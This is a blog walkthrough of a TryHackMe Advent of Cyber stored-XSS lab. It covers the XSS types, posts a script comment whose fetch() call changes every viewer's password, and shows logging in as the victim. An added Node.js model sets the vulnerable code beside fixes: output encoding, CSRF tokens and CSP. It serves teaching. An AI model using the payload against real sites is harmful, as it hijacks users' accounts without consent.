TryHackMe Web Exploitation Pesky Elf Forum XSS

We are back with Day 5 of the “Advent of Cyber” event by TryHackMe. If you haven’t solved the previous day’s challenge yet, click here.

This challenge is again based on Web Exploitation, and the task is named Pesky Elf Forum.



    Learning Objectives:


    • What is an XSS vulnerability?
    • What Types of XSS vulnerabilities are there?
    • Challenge Walkthrough.




    What is an XSS vulnerability?


Cross-Site Scripting, better known as XSS in the cybersecurity community, is classified as an injection attack: malicious JavaScript is injected into a web application so that it is executed in the browsers of other users who view the affected page.


If you can get JavaScript to run in a victim’s browser, there are numerous things you can achieve. This ranges from stealing the victim’s cookies to take over their session (unless the session cookie is marked HttpOnly, in which case script cannot read it), running a keylogger that records every key the user presses while visiting the website, redirecting the user to a different website altogether, or performing an action on the website on the victim’s behalf, such as placing an order or resetting their password. The last case is exactly what this challenge exploits: the script runs with the viewer’s session, so anything the viewer is allowed to do, the script can do.



    What types of XSS vulnerabilities are there?



1. DOM: the payload never reaches the server; client-side JavaScript reads attacker-controlled data (for example from the URL fragment) and writes it into the page unsafely.
2. Reflected: the payload is sent in a request (URL parameter, form field) and echoed straight back in that response, so the victim must be tricked into sending the request.
3. Stored: the payload is saved by the application (a comment, a profile field) and served to every user who later views it. This is the type used in this challenge.
4. Blind: a stored payload that lands on a page the attacker cannot see, such as an admin panel or support queue, so the attacker only learns it fired when the script calls back out.





Let’s get started.

    1. What flag did you get when you disabled the plugin?


Log in with the username McSkidy and the password password.

Leave a comment on any post that contains an HTML link, for example: <a href="https://www.kumaratuljaiswal.in">kumaratuljaiswal.in</a>





Once your comment is posted, you’ll see that the text ‘kumaratuljaiswal.in’ is underlined, i.e. it has been rendered as a clickable link.




This means the comment is stored and displayed exactly as you wrote it: the anchor tag was neither stripped out nor HTML-encoded on output. Since arbitrary tags survive, the next test is a <script> tag, to see whether the website will execute any JavaScript that is entered.



Using the URL you found earlier for changing the user’s password (a plain GET to the settings page with the new password as a query parameter), you can try the following payload:


    <script>fetch('/settings?new_password=pass123');</script>

     

     

The <script> tag tells the browser we want to run some JavaScript, and the fetch() call makes a network request to the specified URL. Because the URL is on the same origin as the forum, the browser attaches the viewer’s session cookie to that request, so the password change is performed as whoever is viewing the thread, not as the poster.

After posting the above as a comment, you can view the page source to check that it was stored intact. The screenshot below shows that the script tags are not being stripped out or encoded and, in fact, execute:




Now that the XSS is stored on the forum, any logged-in user who views the thread will automatically have their password changed to pass123. So log out and check whether the Grinch has visited the thread by trying to log in as them (it may take up to a minute before the Grinch visits the page and their password changes).
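To make the chain above concrete, here is an added example that is not code from the TryHackMe room or from this post: a self-contained Node.js model of the forum’s comment rendering and its settings endpoint, with a stand-in for the victim’s browser. It shows why the stored payload changes the viewer’s password, and places the vulnerable rendering and endpoint next to their fixed versions (HTML-encoding on output; POST plus CSRF token plus current password for the change). The user names follow the room; the Grinch’s original password, the origin http://forum.local, the session layout and every function name are assumptions made for this example.

```javascript
// Added example, not code from the TryHackMe room or from this post.
// Constructed user table; 'grinch-original' is a placeholder, not the room's value.
const users = new Map([
  ['McSkidy', { password: 'password' }],
  ['grinch', { password: 'grinch-original' }],
]);

// Vulnerable rendering: comment text is concatenated into the page as-is,
// so <a> and <script> tags typed by the poster become live markup.
function renderCommentVulnerable(text) {
  return `<div class="comment">${text}</div>`;
}

// Fix 1: HTML-encode the five metacharacters on output, so the same text is
// shown literally instead of being parsed as markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function renderCommentSafe(text) {
  return `<div class="comment">${escapeHtml(text)}</div>`;
}

// Vulnerable endpoint, modelled on the URL the payload calls: a plain GET with
// ?new_password= changes the password of whoever's session arrives with it.
// Returns an HTTP-style status code. The origin is an assumed value.
function settingsVulnerable(req, session) {
  const url = new URL(req.url, 'http://forum.local');
  const newPassword = url.searchParams.get('new_password');
  if (!newPassword) return 400;
  users.get(session.user).password = newPassword;
  return 200;
}

// Fix 2: a state change needs a POST, a CSRF token bound to the session and
// the current password, so a script-triggered GET cannot do it on its own.
function settingsHardened(req, session) {
  if (req.method !== 'POST') return 405;
  if (!req.body || req.body.csrf !== session.csrf) return 403;
  const account = users.get(session.user);
  if (req.body.current_password !== account.password) return 403;
  if (!req.body.new_password) return 400;
  account.password = req.body.new_password;
  return 200;
}

// Stand-in for the victim's browser: for every <script>fetch('...')</script>
// in the page it sends a same-origin GET carrying the victim's own session,
// which is what fetch() does by default (credentials: 'same-origin').
// Returns the number of requests it fired.
function browseThread(html, session, settingsHandler) {
  const scriptFetch = /<script>\s*fetch\('([^']+)'\);?\s*<\/script>/g;
  let count = 0;
  for (const m of html.matchAll(scriptFetch)) {
    settingsHandler({ method: 'GET', url: m[1], body: {} }, session);
    count += 1;
  }
  return count;
}

// The attack from the post: McSkidy posts the payload, the Grinch views the
// thread. Returns the Grinch's password afterwards.
const PAYLOAD = "<script>fetch('/settings?new_password=pass123');</script>";

function runScenario(render, settingsHandler) {
  users.get('grinch').password = 'grinch-original';   // reset between runs
  const page = render(PAYLOAD);                         // comment stored and served to every viewer
  const grinchSession = { user: 'grinch', csrf: 'csrf-token-for-grinch' }; // assumed session shape
  browseThread(page, grinchSession, settingsHandler);
  return users.get('grinch').password;
}

console.log('vulnerable render + GET endpoint :', runScenario(renderCommentVulnerable, settingsVulnerable)); // pass123
console.log('escaped render + GET endpoint    :', runScenario(renderCommentSafe, settingsVulnerable));       // grinch-original
console.log('vulnerable render + POST endpoint:', runScenario(renderCommentVulnerable, settingsHardened));   // grinch-original
```

Either fix on its own breaks this particular chain, but they address different bugs: output encoding stops the forum from serving attacker markup to other users, while the POST/CSRF/current-password check stops a single forged request from changing credentials even if script does run. A real fix does both, and adds a Content-Security-Policy that forbids inline script as a further layer.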



    Username: grinch

    Password: pass123



Once logged in, go to the settings page again; this time you’ll find an additional option to disable the Christmas to Buttmas plugin.




    Disable the plugin, and you’ll be awarded a flag.


    Done :-)


    Disclaimer

     

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other free, intentionally vulnerable resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of this information and strongly advises against it. Please read the word hacking as ethical hacking or penetration testing every time it is used. We do not promote, encourage, support or incite any illegal activity or hacking.
